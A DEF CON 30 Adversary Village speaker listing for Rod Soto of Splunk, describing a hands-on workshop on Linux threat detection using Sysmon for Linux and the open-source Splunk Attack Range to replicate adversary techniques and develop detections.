Adversary Village
DEF CON 30
Speakers

Rod Soto

Researcher at Splunk

Security Researcher at Splunk.

Workshop: Linux Threat Detection with Attack Range
Hands-on Workshop

The release of Microsoft Sysmon for Linux gives defenders new opportunities for monitoring, management and detection development on Linux Operating Systems. In this presentation, presenters will showcase open source Splunk Attack Range in order to replicate adversarial TTPs, record, analyze and develop detections based on Linux Sysmon data.